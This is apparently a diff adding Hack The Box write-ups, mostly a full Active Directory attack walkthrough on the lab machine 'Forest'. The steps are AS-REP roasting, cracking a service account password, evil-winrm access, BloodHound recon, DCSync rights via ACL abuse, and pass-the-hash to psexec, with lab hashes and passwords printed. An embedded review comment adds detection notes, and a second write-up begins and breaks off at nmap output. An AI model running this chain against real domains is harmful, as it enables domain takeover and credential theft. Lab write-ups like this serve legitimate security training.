+ user:[SM_9b69f1b9d2cc45549] rid:[0x469]
+ user:[SM_7c96b981967141ebb] rid:[0x46a]
+ user:[SM_c75ee099d0a64c91b] rid:[0x46b]
+ user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
+ user:[HealthMailboxc3d7722] rid:[0x46e]
+ user:[HealthMailboxfc9daad] rid:[0x46f]
+ user:[HealthMailboxc0a90c9] rid:[0x470]
+ user:[HealthMailbox670628e] rid:[0x471]
+ user:[HealthMailbox968e74d] rid:[0x472]
+ user:[HealthMailbox6ded678] rid:[0x473]
+ user:[HealthMailbox83d6781] rid:[0x474]
+ user:[HealthMailboxfd87238] rid:[0x475]
+ user:[HealthMailboxb01ac64] rid:[0x476]
+ user:[HealthMailbox7108a4e] rid:[0x477]
+ user:[HealthMailbox0659cc1] rid:[0x478]
+ user:[sebastien] rid:[0x479]
+ user:[lucinda] rid:[0x47a]
+ user:[svc-alfresco] rid:[0x47b]
+ user:[andy] rid:[0x47e]
+ user:[mark] rid:[0x47f]
+ user:[santi] rid:[0x480]
+ [...]
+
+
+
+Now we got a list of users through the RPC client because the NULL sessions are allowed. The svc-alfresco is most likely a service account, so let's bruteforce his hash using GetNPUsers.py:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → locate GetNPUsers.py
+ /usr/share/doc/python3-impacket/examples/GetNPUsers.py
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → cp $(locate GetNPUsers.py) .
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → python3 GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ [*] Getting TGT for svc-alfresco
+ $krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
+
+
+
+And we got svc-alfresco's TGT which is a hash that contains the encrypted password. This is because the 'Do not require Kerberos preauthentication' is set, and svc-alfresco is not configured with pre-authentication. Next step is to bruteforce the hash itself:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → vim hash.txt
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → cat hash.txt
+ $krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → john -w=/usr/share/wordlists/rockyou.txt hash.txt
+ [...]
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
+ [...]
+
+
+
+And now that we have alfresco's password, let's use evil-winrm to login:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → sudo gem install evil-winrm
+ Fetching nori-2.6.0.gem
+ Fetching rubyntlm-0.6.3.gem
+ Fetching multi_json-1.15.0.gem
+ Fetching little-plugger-1.1.4.gem
+ Fetching gyoku-1.3.1.gem
+ Fetching logging-2.3.0.gem
+ Fetching httpclient-2.8.3.gem
+ Fetching builder-3.2.4.gem
+ Fetching gssapi-1.3.1.gem
+ Fetching evil-winrm-2.4.gem
+ Fetching winrm-2.3.6.gem
+ Fetching winrm-fs-1.3.5.gem
+ Fetching erubi-1.10.0.gem
+ Successfully installed rubyntlm-0.6.3
+ Successfully installed nori-2.6.0
+ Successfully installed multi_json-1.15.0
+ Successfully installed little-plugger-1.1.4
+ Successfully installed logging-2.3.0
+ Successfully installed httpclient-2.8.3
+ Successfully installed builder-3.2.4
+ Successfully installed gyoku-1.3.1
+ Successfully installed gssapi-1.3.1
+ Successfully installed erubi-1.10.0
+ Successfully installed winrm-2.3.6
+ Successfully installed winrm-fs-1.3.5
+ Happy hacking! :)
+ Successfully installed evil-winrm-2.4
+ [...]
+
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> sysinfo
+ The term 'sysinfo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ At line:1 char:1
+ + sysinfo
+ + ~~~~~~~
+ + CategoryInfo : ObjectNotFound: (sysinfo:String) [], CommandNotFoundException
+ + FullyQualifiedErrorId : CommandNotFoundException
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> systeminfo
+ Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ + systeminfo
+ + ~~~~~~~~~~.
+ At line:1 char:1
+ + systeminfo
+ + ~~~~~~~~~~
+ + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ + FullyQualifiedErrorId : NativeCommandFailed
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
+ *Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
+ e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get to the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now let's check the users on this machine:
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net users
+
+ User accounts for \\
+
+ -------------------------------------------------------------------------------
+ $331000-VK4ADACQNUCA Administrator andy
+ DefaultAccount Guest HealthMailbox0659cc1
+ HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
+ HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
+ HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
+ HealthMailboxfd87238 krbtgt lucinda
+ mark santi sebastien
+ SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
+ SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
+ SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
+ svc-alfresco
+ The command completed with one or more errors.
+
+
+Now here we need to do some AD recon, and we're going to use BloodHound
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → sudo apt install bloodhound -y
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → bloodhound
+
+
+` 
+
+Here we see that we need to connect to the neo4j database, so let's start it up with sudo privileges:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/28 ] [~/HTB/Forest]
+ → sudo neo4j console
+ [sudo] password for nothing:
+ Directories in use:
+ home: /usr/share/neo4j
+ config: /usr/share/neo4j/conf
+ logs: /usr/share/neo4j/logs
+ plugins: /usr/share/neo4j/plugins
+ import: /usr/share/neo4j/import
+ data: /usr/share/neo4j/data
+ certificates: /usr/share/neo4j/certificates
+ run: /usr/share/neo4j/run
+ Starting Neo4j.
+ WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
+ 2021-05-24 16:45:38.529+0000 INFO Starting...
+ 2021-05-24 16:45:40.163+0000 INFO ======== Neo4j 4.2.1 ========
+ 2021-05-24 16:45:41.980+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
+ 2021-05-24 16:45:41.985+0000 INFO Setting up initial user from defaults: neo4j
+ 2021-05-24 16:45:41.986+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
+ 2021-05-24 16:45:42.003+0000 INFO Setting version for 'security-users' to 2
+ 2021-05-24 16:45:42.009+0000 INFO After initialization of system graph model component 'security-users' have version 2 and status CURRENT
+ 2021-05-24 16:45:42.015+0000 INFO Performing postInitialization step for component 'security-users' with version 2 and status CURRENT
+ 2021-05-24 16:45:42.697+0000 INFO Bolt enabled on localhost:7687.
+ 2021-05-24 16:45:43.379+0000 INFO Remote interface available at http://localhost:7474/
+ 2021-05-24 16:45:43.380+0000 INFO Started.
+
+
+
+Now let's log into it with the default credentials **neo4j:neo4j** :
+
+
+
+More precisely, we're going to use the Bloodhound Ingestor to collect the Active Directory Data:
+
+ 
+
+Once you've set the new password, simply login:
+
+
+
+Once you've logged in to bloodhound, we're going to use SharpHound.ps1 in order to find the AD Administrators, to do so we're going to make use of our Evil-WinRM session:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → sudo updatedb
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → locate SharpHound.ps1
+ /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
+ /usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → ls -lash SharpHound.ps1
+ 952K -rw-r--r-- 1 nothing nothing 952K May 24 18:57 SharpHound.ps1
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
+
+
+Now here we need to upload SharpHound.ps1:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → sudo python3 -m http.server 80
+ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
+
+
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iwr -uri "http://10.10.14.13/SharpHound.ps1" -outfile "sharp.ps1"
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+
+
+ Directory: C:\Users\svc-alfresco\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/24/2021 10:24 AM 974235 sharp.ps1
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./sharp.ps1
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -CollectionMethod All
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+
+
+ Directory: C:\Users\svc-alfresco\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
+ -a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
+ -a---- 5/24/2021 10:24 AM 974235 sharp.ps1
+
+
+
+Once we run sharp.ps1 we get a zip file, so let's copy it back to our kali machine, to do so we can use evil-winrm's built-in download function:
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20210524104146_BloodHound.zip
+ Info: Downloading C:\Users\svc-alfresco\Documents\20210524104146_BloodHound.zip to 20210524104146_BloodHound.zip
+
+
+ Info: Download successful!
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> exit
+
+ Info: Exiting with code 0
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → ls -lashg 20210524104146_BloodHound.zip
+ 16K -rw-r--r-- 1 nothing 15K May 24 19:39 20210524104146_BloodHound.zip
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → ls -lash 20210524104146_BloodHound.zip
+ 16K -rw-r--r-- 1 nothing nothing 15K May 24 19:39 20210524104146_BloodHound.zip
+
+
+
+Now that we got the zip file locally, let's load it in bloodhound:
+
+ 
+
+So here we finally see what's going on, and we can find the shortest path to domain admin:
+
+
+
+svc-alfresco has **GenericAll** rights on the **Exchange Windows Permissions** group, so we can add this user to the group, next the WriteDacl rights allows us to give DCsync rights to our compromised user, and retrieve the NTLM hashes for all users on the domain. To exploit the ACL path automatically we can use [aclpwn](https://github.com/fox-it/aclpwn.py):
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → pip install aclpwn
+ Collecting aclpwn
+ Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
+ Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.25.1)
+ Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.8.1)
+ Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.9.22)
+ Collecting neo4j-driver
+ Downloading neo4j-driver-4.2.1.tar.gz (69 kB)
+ |████████████████████████████████| 69 kB 1.6 MB/s
+ Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2021.1)
+ Building wheels for collected packages: neo4j-driver
+ Building wheel for neo4j-driver (setup.py) ... done
+ Created wheel for neo4j-driver: filename=neo4j_driver-4.2.1-py3-none-any.whl size=95273 sha256=2b8a5fca03df766fe46cfdcd83ef272170de7f3d1000c49c114ae78bd4efeea1
+ Stored in directory: /home/nothing/.cache/pip/wheels/fe/a2/12/36d9ab6287417260db156b6021d409f296d274a11f23373cfe
+ Successfully built neo4j-driver
+ Installing collected packages: neo4j-driver, aclpwn
+ WARNING: The script aclpwn is installed in '/home/nothing/.local/bin' which is not on PATH.
+ Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
+ Successfully installed aclpwn-1.0.0 neo4j-driver-4.2.1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → PATH=$PATH:/home/nothing/.local/bin
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → aclpwn -f svc-alfresco -ft user -t htb.local -tt domain -d htb.local -dp bloodhound -du neo4j --server 10.10.10.161 -u svc-alfresco -sp s3rvice -p s3rvice
+
+
+So you can use that, or you can also just do it manually as follows:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
+ The command completed successfully.
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user svc-alfresco
+ User name svc-alfresco
+ Full Name svc-alfresco
+ Comment
+ User's comment
+ Country/region code 000 (System Default)
+ Account active Yes
+ Account expires Never
+
+ Password last set 5/24/2021 11:15:40 AM
+ Password expires Never
+ Password changeable 5/25/2021 11:15:40 AM
+ Password required Yes
+ User may change password Yes
+
+ Workstations allowed All
+ Logon script
+ User profile
+ Home directory
+ Last logon 5/24/2021 9:27:15 AM
+
+ Logon hours allowed All
+
+ Local Group Memberships
+ Global Group memberships *Exchange Windows Perm*Domain Users
+ *Service Accounts
+ The command completed successfully.
+
+
+So here we added alfresco to the **Exchange Windows Permissions @HTB.LOCAL** , next step is to grant alfresco **DcSync privileges** using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
+
+
+Obviously we need PowerView.ps1 so let's first copy it to our local directory where we started the Evil-WinRM session:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → locate PowerView.ps1
+ /usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1
+ /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
+
+
+
+Be careful, these are outdated PowerView.ps1 files, you need to get the most recent one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -O PowerView.ps1
+ --2021-05-24 20:16:08-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 770279 (752K) [text/plain]
+ Saving to: ‘PowerView.ps1’
+
+ PowerView.ps1 100%[===================================================================================================================================================>] 752.23K 3.25MB/s in 0.2s
+
+ 2021-05-24 20:16:08 (3.25 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
+
+
+
+Now we upload PowerView to the machine:
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
+ Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
+
+
+ Data: 1027036 bytes of 1027036 bytes copied
+
+ Info: Upload successful!
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+
+
+ Directory: C:\Users\svc-alfresco\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
+ -a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
+ -a---- 5/24/2021 11:31 AM 770279 PowerView.ps1
+ -a---- 5/24/2021 10:24 AM 974235 sharp.ps1
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> remove-module PowerView
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> import-module .\PowerView.ps1
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "svc-alfresco" -Rights DCSync
+
+
+
+And from there we can use secretsdump.py to get the hashes of all users using DcSync:
+
+
+ secretsdump.py svc-alfresco:s3rvice@10.10.10.161
+ Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
+
+ [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
+ [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+ [*] Using the DRSUAPI method to get NTDS.DIT secrets
+ htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
+ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
+ DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+
+ [...]
+
+ [*] Cleaning up...
+
+
+And finally we simply use the Admin hash with psexec.py, if you don't have it yet, install it as follows:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → git clone https://github.com/SecureAuthCorp/impacket.git
+ Cloning into 'impacket'...
+ remote: Enumerating objects: 19239, done.
+ remote: Counting objects: 100% (339/339), done.
+ remote: Compressing objects: 100% (205/205), done.
+ remote: Total 19239 (delta 193), reused 232 (delta 133), pack-reused 18900
+ Receiving objects: 100% (19239/19239), 6.61 MiB | 4.26 MiB/s, done.
+ Resolving deltas: 100% (14585/14585), done.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → cd impacket
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
+ → sudo pip3 install .
+ [sudo] password for nothing:
+ Processing /home/nothing/HTB/Forest/impacket
+ Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (4.0.0)
+ Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.1.2)
+ Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.18.2)
+ Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (2.8.1)
+ Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.9.3)
+ Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (20.0.1)
+ Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.4.8)
+ Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (3.9.7)
+ Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.16.0)
+ Building wheels for collected packages: impacket
+ Building wheel for impacket (setup.py) ... done
+ Created wheel for impacket: filename=impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3-none-any.whl size=1397782 sha256=39758aa69b8434256a2f79b26209d55225fecd0090950c922499e17de963a10f
+ Stored in directory: /tmp/pip-ephem-wheel-cache-ln48imhy/wheels/7a/85/ca/606ceaff4c6e06dc108bb711bd0c0de17bc79b379a138a14c9
+ Successfully built impacket
+ Installing collected packages: impacket
+ Attempting uninstall: impacket
+ Found existing installation: impacket 0.9.22
+ Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
+ Can't uninstall 'impacket'. No files were found to uninstall.
+ Successfully installed impacket-0.9.23.dev1+20210519.170900.2f5c2476
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
+ → sudo python3 setup.py install
+
+
+
+Then use it with the admin hash:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
+ → impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/Administrator@10.10.10.161
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [*] Requesting shares on 10.10.10.161.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file kvZZufbZ.exe
+ [*] Opening SVCManager on 10.10.10.161.....
+ [*] Creating service HFYI on 10.10.10.161.....
+ [*] Starting service HFYI.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>systeminfo
+
+ Host Name: FOREST
+ OS Name: Microsoft Windows Server 2016 Standard
+ OS Version: 10.0.14393 N/A Build 14393
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Primary Domain Controller
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00376-30821-30176-AA930
+ Original Install Date: 9/18/2019, 10:07:59 AM
+ System Boot Time: 5/24/2021, 9:09:23 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware7,1
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume2
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-08:00) Pacific Time (US & Canada)
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 635 MB
+ Virtual Memory: Max Size: 2,431 MB
+ Virtual Memory: Available: 990 MB
+ Virtual Memory: In Use: 1,441 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: htb.local
+ Logon Server: N/A
+ Hotfix(s): 3 Hotfix(s) Installed.
+ [01]: KB3199986
+ [02]: KB4512574
+ [03]: KB4103720
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) 82574L Gigabit Network Connection
+ Connection Name: Ethernet0
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.161
+ Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+ C:\Windows\system32>cd ..
+
+ C:\Windows>cd ..
+
+ C:\>cd Users\Administrator\Desktop
+
+ C:\Users\Administrator\Desktop>type root.txt
+ f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
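Review bot: the Kerberos terminology in Part 2 is wrong in a way that will mislead readers: GetNPUsers.py does not "bruteforce his hash", and the `$krb5asrep$23$...` line is not a TGT but an AS-REP, whose encrypted part is keyed from the account's password; it is obtainable without credentials only because the account has "Do not require Kerberos preauthentication" set, which the following sentence states twice in different words. Suggest: "svc-alfresco has pre-authentication disabled, so the KDC hands out an AS-REP for it without proof of the password; the encrypted part of that reply can then be cracked offline with john." For the same reason the `net group ... /add` and `Add-DomainObjectAcl ... -Rights DCSync` steps in Part 3 deserve one line on what a defender would see and fix: membership changes to Exchange Windows Permissions are logged as security event 4728, a DCSync from a non-DC account shows as event 4662 with the replication extended rights, and the underlying issue is the WriteDacl the Exchange group holds on the domain object. Formatting in the same hunk: the line containing only "` " after `→ bloodhound` is a stray backtick, the lines "Now let's log into it with the default credentials", "Bloodhound Ingestor", "Once you've set the new password", "load it in bloodhound", "shortest path to domain admin" and the Conclusion's "progress graph" are each followed by nothing where an image reference belongs, and the `$pass = convertto-securestring ...` / `$cred = New-Object ...` pair appears twice, the first time before PowerView.ps1 has been uploaded, so the first pair is dead and should be dropped. Minor: "Now we got a list of users through the RPC client because the NULL sessions are allowed" should read "we obtained a list of users over RPC because null sessions are allowed".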
diff --git a/Easy/39.md b/Easy/39.md
new file mode 100644
index 0000000..83451d5
--- /dev/null
+++ b/Easy/39.md
@@ -0,0 +1,584 @@
+# Postman Writeup
+
+
+
+## Introduction :
+
+Postman is an easy linux box released back in november 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → nmap -p- -T4 10.10.10.160
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:25 CEST
+ Nmap scan report for 10.10.10.160
+ Host is up (0.041s latency).
+ Not shown: 65531 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 6379/tcp open redis
+ 10000/tcp open snet-sensor-mgmt
+
+ Nmap done: 1 IP address (1 host up) scanned in 26.48 seconds
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → nmap -sCV -p 22,80,6379,10000 10.10.10.160
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:26 CEST
+ Nmap scan report for 10.10.10.160
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
+ | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
+ |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
